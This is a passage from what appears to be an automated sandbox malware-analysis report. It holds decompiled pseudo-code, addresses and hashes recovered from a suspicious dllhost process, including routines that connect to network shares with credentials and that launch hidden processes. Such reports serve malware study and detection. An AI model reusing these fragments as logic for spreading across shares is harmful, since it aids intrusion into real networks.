				_v588 = __edx;
				_t26 = __ecx;
				_t56 =  &_v540 - __ecx;
				do {
					_t42 =  *_t26;
					_t26 = _t26 + 1;
					 *((char*)(_t56 + _t26 - 1)) = _t42;
				} while (_t42 != 0);
				E0286A2B0( &_v540);
				E02863F90( &_v540,  &_v276, "\\\\%s",  &_v540);
				_t63 = _t62 + 0xc;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x20], xmm0");
				_v560 =  &_v276;
				asm("movaps [esp+0x18], xmm0");
				_v576 = 0;
				_t57 = WNetAddConnection2A( &_v580, _v584, _v588, 0);
				if(_t57 != 0) {
					if(_t57 != 0x4c3) {
						L6:
						SetLastError(_t57);
						_pop(_t58);
						return E02870A5D(_v8 ^ _t63, _t58);
					} else {
						E0286B1F0(_t51, _t57);
						_t57 = WNetAddConnection2A( &_v580, _v584, _v588, 0);
						if(_t57 == 0) {
							goto L3;
						} else {
							goto L6;
						}
					}
				} else {
					L3:
					_pop(_t59);
					return E02870A5D(_v8 ^ _t63, _t59);
				}
			}























                                                0x0286b0f6
                                                0x0286b0fc
                                                0x0286b103
                                                0x0286b10f
                                                0x0286b111
                                                0x0286b119
                                                0x0286b11d
                                                0x0286b11f
                                                0x0286b121
                                                0x0286b121
                                                0x0286b123
                                                0x0286b126
                                                0x0286b12a
                                                0x0286b132
                                                0x0286b149
                                                0x0286b14e
                                                0x0286b158
                                                0x0286b15b
                                                0x0286b160
                                                0x0286b16e
                                                0x0286b177
                                                0x0286b186
                                                0x0286b18a
                                                0x0286b1a8
                                                0x0286b1cc
                                                0x0286b1cd
                                                0x0286b1dd
                                                0x0286b1e8
                                                0x0286b1aa
                                                0x0286b1ac
                                                0x0286b1c6
                                                0x0286b1ca
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286b1ca
                                                0x0286b18c
                                                0x0286b18c
                                                0x0286b18f
                                                0x0286b1a1
                                                0x0286b1a1

                                                APIs
                                                • WNetAddConnection2A.MPR(?), ref: 0286B180
                                                • SetLastError.KERNEL32(00000000), ref: 0286B1CD
                                                  • Part of subcall function 0286B1F0: WNetCancelConnection2A.MPR(?,00000000,00000001), ref: 0286B24E
                                                • WNetAddConnection2A.MPR(?,?,?,00000000), ref: 0286B1C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Connection2$CancelErrorLast
                                                • String ID: \\%s
                                                • API String ID: 4062109977-3838199987
                                                • Opcode ID: 196d49843436d4dffd38dcf66c1b377157a621b85aa675f13cf15971baecb049
                                                • Instruction ID: 4885137213887c8ea504dc492306b7c3b4085ae6beeef2fd9be2056835f0ca80
                                                • Opcode Fuzzy Hash: 196d49843436d4dffd38dcf66c1b377157a621b85aa675f13cf15971baecb049
                                                • Instruction Fuzzy Hash: BD21B939908345ABC721DF68D809B9BB7E9EFC4314F400919F98DD7250EB3595148B82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0287932B Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E0287932B(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E02874970(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E02883C50( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E02883C50( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E02873440(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E02883C50( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E02883B70();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E02883B70();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E02883B70();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E0287962E(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E02884330(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E02875D43();
					_t183 = 0x22;
					 *_t129 = _t183;
					E02875C10();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                                                0x0287932b
                                                0x02879336
                                                0x0287933d
                                                0x0287933f
                                                0x0287933f
                                                0x02879341
                                                0x0287934a
                                                0x0287934c
                                                0x02879351
                                                0x02879357
                                                0x0287936d
                                                0x02879372
                                                0x02879375
                                                0x02879382
                                                0x02879387
                                                0x028793db
                                                0x028793e3
                                                0x028793e5
                                                0x028793e7
                                                0x028793ea
                                                0x028793ea
                                                0x028793ea
                                                0x028793f0
                                                0x028793f8
                                                0x0287940b
                                                0x0287940e
                                                0x02879410
                                                0x02879413
                                                0x02879414
                                                0x02879435
                                                0x02879438
                                                0x02879438
                                                0x02879416
                                                0x02879416
                                                0x02879418
                                                0x02879423
                                                0x02879423
                                                0x02879425
                                                0x0287942c
                                                0x02879427
                                                0x02879427
                                                0x02879427
                                                0x02879425
                                                0x02879439
                                                0x0287943b
                                                0x0287943c
                                                0x0287943f
                                                0x02879441
                                                0x0287944b
                                                0x02879455
                                                0x02879443
                                                0x02879443
                                                0x02879443
                                                0x0287945a
                                                0x0287945a
                                                0x0287945f
                                                0x02879462
                                                0x0287946d
                                                0x0287946d
                                                0x0287946d
                                                0x0287946d
                                                0x02879471
                                                0x02879478
                                                0x02879479
                                                0x0287947c
                                                0x0287947f
                                                0x0287947f
                                                0x02879481
                                                0x00000000
                                                0x00000000
                                                0x02879499
                                                0x028794a0
                                                0x028794a4
                                                0x028794a7
                                                0x028794aa
                                                0x028794ac
                                                0x028794ac
                                                0x028794ac
                                                0x028794ae
                                                0x028794b1
                                                0x028794b4
                                                0x028794b6
                                                0x028794be
                                                0x028794c4
                                                0x028794c7
                                                0x028794ca
                                                0x028794cb
                                                0x028794ce
                                                0x028794d1
                                                0x028794d1
                                                0x028794d6
                                                0x028794d9
                                                0x00000000
                                                0x00000000
                                                0x028794f1
                                                0x028794f6
                                                0x028794fa
                                                0x00000000
                                                0x00000000
                                                0x028794fe
                                                0x02879501
                                                0x02879502
                                                0x02879502
                                                0x02879504
                                                0x02879507
                                                0x00000000
                                                0x00000000
                                                0x02879509
                                                0x0287950c
                                                0x02879513
                                                0x02879516
                                                0x02879519
                                                0x0287952f
                                                0x0287952f
                                                0x0287952f
                                                0x0287951b
                                                0x0287951b
                                                0x0287951d
                                                0x02879520
                                                0x0287952b
                                                0x02879522
                                                0x02879525
                                                0x02879525
                                                0x02879520
                                                0x00000000
                                                0x02879519
                                                0x0287950e
                                                0x0287950e
                                                0x02879510
                                                0x02879510
                                                0x02879464
                                                0x02879464
                                                0x02879467
                                                0x02879532
                                                0x02879532
                                                0x02879534
                                                0x02879536
                                                0x02879539
                                                0x0287953a
                                                0x0287953b
                                                0x0287953c
                                                0x02879544
                                                0x02879544
                                                0x02879544
                                                0x02879546
                                                0x02879549
                                                0x0287954c
                                                0x0287954e
                                                0x0287954e
                                                0x02879550
                                                0x02879562
                                                0x02879566
                                                0x02879569
                                                0x02879570
                                                0x02879578
                                                0x02879578
                                                0x0287957b
                                                0x0287957d
                                                0x0287958e
                                                0x0287958e
                                                0x02879592
                                                0x02879592
                                                0x02879595
                                                0x02879597
                                                0x0287959a
                                                0x00000000
                                                0x0287957f
                                                0x0287957f
                                                0x02879585
                                                0x02879585
                                                0x02879589
                                                0x0287959c
                                                0x0287959c
                                                0x028795a0
                                                0x028795a1
                                                0x028795a3
                                                0x028795a5
                                                0x028795e6
                                                0x028795e6
                                                0x028795e8
                                                0x028795f5
                                                0x028795f5
                                                0x028795f7
                                                0x028795f9
                                                0x028795fa
                                                0x028795fb
                                                0x02879602
                                                0x02879605
                                                0x02879607
                                                0x02879607
                                                0x02879608
                                                0x0287960a
                                                0x0287960d
                                                0x0287960d
                                                0x0287960f
                                                0x02879611
                                                0x00000000
                                                0x02879611
                                                0x028795ea
                                                0x028795ec
                                                0x00000000
                                                0x00000000
                                                0x028795ee
                                                0x00000000
                                                0x00000000
                                                0x028795f0
                                                0x028795f3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x028795f3
                                                0x028795ac
                                                0x028795b2
                                                0x028795b2
                                                0x028795b4
                                                0x028795b5
                                                0x028795b6
                                                0x028795b7
                                                0x028795be
                                                0x028795c1
                                                0x028795c3
                                                0x028795c4
                                                0x028795c6
                                                0x028795d3
                                                0x028795d3
                                                0x028795d5
                                                0x028795d7
                                                0x028795d8
                                                0x028795d9
                                                0x028795e0
                                                0x028795e3
                                                0x028795e5
                                                0x028795e5
                                                0x00000000
                                                0x028795e5
                                                0x028795c8
                                                0x028795c8
                                                0x028795ca
                                                0x00000000
                                                0x00000000
                                                0x028795cc
                                                0x00000000
                                                0x00000000
                                                0x028795ce
                                                0x028795d1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x028795d1
                                                0x028795ae
                                                0x028795b0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x028795b0
                                                0x02879581
                                                0x02879583
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02879583
                                                0x0287957d
                                                0x00000000
                                                0x02879467
                                                0x02879462
                                                0x02879389
                                                0x0287938b
                                                0x00000000
                                                0x0287938d
                                                0x028793a3
                                                0x028793a8
                                                0x028793aa
                                                0x028793b6
                                                0x028793bc
                                                0x028793bd
                                                0x028793bf
                                                0x028793c1
                                                0x028793cc
                                                0x028793cc
                                                0x028793cf
                                                0x028793d1
                                                0x028793d1
                                                0x028793d4
                                                0x028793ac
                                                0x028793ac
                                                0x028793ac
                                                0x00000000
                                                0x028793aa
                                                0x02879359
                                                0x02879359
                                                0x02879360
                                                0x02879361
                                                0x02879363
                                                0x02879615
                                                0x02879619
                                                0x0287961e
                                                0x0287961e
                                                0x0287962d
                                                0x0287962d

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 77f5d455d6bbc46f51ca056e9603e57878b5f4042b499e8e25835957a280ac19
                                                • Instruction ID: 7fdf83ebb01317ce73289f4504332ea1704372f8b4737d6c9c515daaa1937c70
                                                • Opcode Fuzzy Hash: 77f5d455d6bbc46f51ca056e9603e57878b5f4042b499e8e25835957a280ac19
                                                • Instruction Fuzzy Hash: 65A1657EA047969FEB21CF28C8907AEBBE5EF15314F1842ADD499DB281D338C941CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02869B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 97%
                                                			E02869B40(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* __edi;
				void* __esi;
				signed int _t47;
				intOrPtr _t48;
				char _t50;
				intOrPtr _t54;
				void* _t55;
				intOrPtr _t57;
				char _t59;
				intOrPtr _t63;
				void* _t64;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t69;
				void* _t73;
				intOrPtr* _t76;
				void* _t80;
				void* _t84;
				void* _t85;
				intOrPtr* _t86;
				intOrPtr* _t87;
				signed int _t88;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t91;
				void* _t92;

				_t47 = 0;
				_v12 = __edx;
				_t66 = __ecx;
				_v8 = 0;
				asm("o16 nop [eax+eax]");
				while(1) {
					_t3 = _t47 + 0x2894e80; // 0x2894e80
					_t86 = _t3;
					if(_t86 == 0) {
						break;
					} else {
						_t76 = _t86;
						_t4 = _t76 + 1; // 0x2894e81
						_t85 = _t4;
						goto L3;
					}
					do {
						L3:
						_t57 =  *_t76;
						_t76 = _t76 + 1;
					} while (_t57 != 0);
					if(_t76 == _t85) {
						break;
					}
					_t90 = 0;
					if( *(_t66 + 0x20) <= 0) {
						L10:
						_t91 = E02870A6E(_t90, _t99, 0x100);
						_t92 = _t92 + 4;
						_v16 = _t91;
						_t80 = _t91 - _v8 - 0x2894e80;
						do {
							_t59 =  *_t86;
							_t86 = _t86 + 1;
							 *((char*)(_t80 + _t86 - 1)) = _t59;
						} while (_t59 != 0);
						if(E02866F70(_t66) != 0) {
							_t16 = _t66 + 0x20; // 0x4d005c
							_t17 = _t66 + 0x1c; // 0x610074
							 *((intOrPtr*)( *_t17 +  *_t16 * 4)) = _t91;
							 *(_t66 + 0x20) =  *(_t66 + 0x20) + 1;
						}
						L14:
						_t47 = _v8 - 0xffffff80;
						_v8 = _t47;
						if(_t47 < 0x600) {
							continue;
						}
						break;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t63 = 0;
						_t6 = _t66 + 0x20; // 0x4d005c
						if(_t90 <  *_t6) {
							_t7 = _t66 + 0x1c; // 0x610074
							_t63 =  *((intOrPtr*)( *_t7 + _t90 * 4));
						}
						_t64 = E02877612(_t86, _t90, _t63, _t86);
						_t92 = _t92 + 8;
						if(_t64 == 0) {
							goto L14;
						}
						_t90 = _t90 + 1;
						_t10 = _t66 + 0x20; // 0x4d005c
						_t99 = _t90 -  *_t10;
						if(_t90 <  *_t10) {
							continue;
						}
						goto L10;
					}
					goto L14;
				}
				_t67 = _v12;
				_t48 = 0;
				_v8 = 0;
				asm("o16 nop [eax+eax]");
				while(1) {
					_t26 = _t48 + "123"; // 0x2890e80
					_t87 = _t26;
					if(_t87 == 0) {
						break;
					}
					_t69 = _t87;
					_t27 = _t69 + 1; // 0x2890e81
					_t84 = _t27;
					do {
						_t48 =  *_t69;
						_t69 = _t69 + 1;
					} while (_t48 != 0);
					if(_t69 == _t84) {
						break;
					}
					_t88 = 0;
					if( *(_t67 + 0x20) <= 0) {
						L25:
						_t89 = E02870A6E(_t88, _t111, 0x100);
						_t92 = _t92 + 4;
						_v16 = _t89;
						_t73 = _t89 - _v8 - "123";
						do {
							_t50 =  *_t87;
							_t36 = _t87 + 1; // 0x3332
							_t87 = _t36;
							 *((char*)(_t73 + _t87 - 1)) = _t50;
						} while (_t50 != 0);
						if(E02866F70(_t67) != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x1c)) +  *(_t67 + 0x20) * 4)) = _t89;
							 *(_t67 + 0x20) =  *(_t67 + 0x20) + 1;
						}
						L29:
						_t48 = _v8 - 0xffffff80;
						_v8 = _t48;
						if(_t48 < 0x4000) {
							continue;
						}
						break;
					} else {
						goto L21;
					}
					while(1) {
						L21:
						_t54 = 0;
						if(_t88 <  *(_t67 + 0x20)) {
							_t54 =  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x1c)) + _t88 * 4));
						}
						_t55 = E02877612(_t87, _t88, _t54, _t87);
						_t92 = _t92 + 8;
						if(_t55 == 0) {
							goto L29;
						}
						_t88 = _t88 + 1;
						_t111 = _t88 -  *(_t67 + 0x20);
						if(_t88 <  *(_t67 + 0x20)) {
							continue;
						}
						goto L25;
					}
					goto L29;
				}
				return _t48;
			}
































                                                0x02869b48
                                                0x02869b4a
                                                0x02869b4e
                                                0x02869b50
                                                0x02869b57
                                                0x02869b60
                                                0x02869b60
                                                0x02869b60
                                                0x02869b68
                                                0x00000000
                                                0x02869b6e
                                                0x02869b6e
                                                0x02869b70
                                                0x02869b70
                                                0x02869b70
                                                0x02869b70
                                                0x02869b73
                                                0x02869b73
                                                0x02869b73
                                                0x02869b75
                                                0x02869b76
                                                0x02869b7c
                                                0x00000000
                                                0x00000000
                                                0x02869b7e
                                                0x02869b83
                                                0x02869ba6
                                                0x02869bb0
                                                0x02869bb2
                                                0x02869bb7
                                                0x02869bbd
                                                0x02869bc3
                                                0x02869bc3
                                                0x02869bc5
                                                0x02869bc8
                                                0x02869bcc
                                                0x02869bd9
                                                0x02869bdb
                                                0x02869bde
                                                0x02869be1
                                                0x02869be4
                                                0x02869be4
                                                0x02869be7
                                                0x02869bea
                                                0x02869bed
                                                0x02869bf5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02869b85
                                                0x02869b85
                                                0x02869b85
                                                0x02869b87
                                                0x02869b8a
                                                0x02869b8c
                                                0x02869b8f
                                                0x02869b8f
                                                0x02869b94
                                                0x02869b99
                                                0x02869b9e
                                                0x00000000
                                                0x00000000
                                                0x02869ba0
                                                0x02869ba1
                                                0x02869ba1
                                                0x02869ba4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02869ba4
                                                0x00000000
                                                0x02869b85
                                                0x02869bfb
                                                0x02869bfe
                                                0x02869c00
                                                0x02869c07
                                                0x02869c10
                                                0x02869c10
                                                0x02869c10
                                                0x02869c18
                                                0x00000000
                                                0x00000000
                                                0x02869c1e
                                                0x02869c20
                                                0x02869c20
                                                0x02869c23
                                                0x02869c23
                                                0x02869c25
                                                0x02869c26
                                                0x02869c2c
                                                0x00000000
                                                0x00000000
                                                0x02869c2e
                                                0x02869c33
                                                0x02869c56
                                                0x02869c60
                                                0x02869c62
                                                0x02869c67
                                                0x02869c6d
                                                0x02869c73
                                                0x02869c73
                                                0x02869c75
                                                0x02869c75
                                                0x02869c78
                                                0x02869c7c
                                                0x02869c89
                                                0x02869c91
                                                0x02869c94
                                                0x02869c94
                                                0x02869c97
                                                0x02869c9a
                                                0x02869c9d
                                                0x02869ca5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02869c35
                                                0x02869c35
                                                0x02869c35
                                                0x02869c3a
                                                0x02869c3f
                                                0x02869c3f
                                                0x02869c44
                                                0x02869c49
                                                0x02869c4e
                                                0x00000000
                                                0x00000000
                                                0x02869c50
                                                0x02869c51
                                                0x02869c54
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02869c54
                                                0x00000000
                                                0x02869c35
                                                0x02869cb1

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 123
                                                • API String ID: 0-2286445522
                                                • Opcode ID: e8d29a36c4079fa1f2a50318564dd048474e7862c7ce3f24c212a982e364fd06
                                                • Instruction ID: db493ccd953f93e55c3bf1bb07751a7f20936b5aed864053f236001930c4aa71
                                                • Opcode Fuzzy Hash: e8d29a36c4079fa1f2a50318564dd048474e7862c7ce3f24c212a982e364fd06
                                                • Instruction Fuzzy Hash: DA41B57D900215DFCF14DF689488AB9B7B6BF49304B164698CC89EF386D731E902CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286A330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49processsynchronizationCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E0286A330(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v96;
				void* _t19;
				WCHAR* _t20;

				_t20 = __ecx;
				E02873440(_t19,  &_v96, 0, 0x44);
				_v96.cb = 0x44;
				_v96.dwFlags = 1;
				_v96.wShowWindow = 5;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x14], xmm0");
				if(CreateProcessW(0, _t20, 0, 0, 0, 0x8000000, 0, 0,  &_v96,  &_v24) == 0) {
					return 0;
				} else {
					WaitForSingleObject(_v24, 0);
					return 1;
				}
			}







                                                0x0286a33d
                                                0x0286a344
                                                0x0286a34c
                                                0x0286a358
                                                0x0286a35f
                                                0x0286a363
                                                0x0286a380
                                                0x0286a38c
                                                0x0286a3a8
                                                0x0286a38e
                                                0x0286a393
                                                0x0286a3a0
                                                0x0286a3a0

                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,?,745EC0B0), ref: 0286A384
                                                • WaitForSingleObject.KERNEL32(?,00000000,?,745EC0B0), ref: 0286A393
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CreateObjectProcessSingleWait
                                                • String ID: D
                                                • API String ID: 623904672-2746444292
                                                • Opcode ID: 8e8abdbc90bd27a12dc80e31c659ff32ce3c016389aa8b299976c87b47278f1b
                                                • Instruction ID: ef371bf7432862319054b94e7aeee9f4748f0a02afa32322714ba0764af86ec3
                                                • Opcode Fuzzy Hash: 8e8abdbc90bd27a12dc80e31c659ff32ce3c016389aa8b299976c87b47278f1b
                                                • Instruction Fuzzy Hash: 2701FE35EC020C7AEB10DA95DC46FEFB76CEB04704F204126FA18BA1C0E6B164148BA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%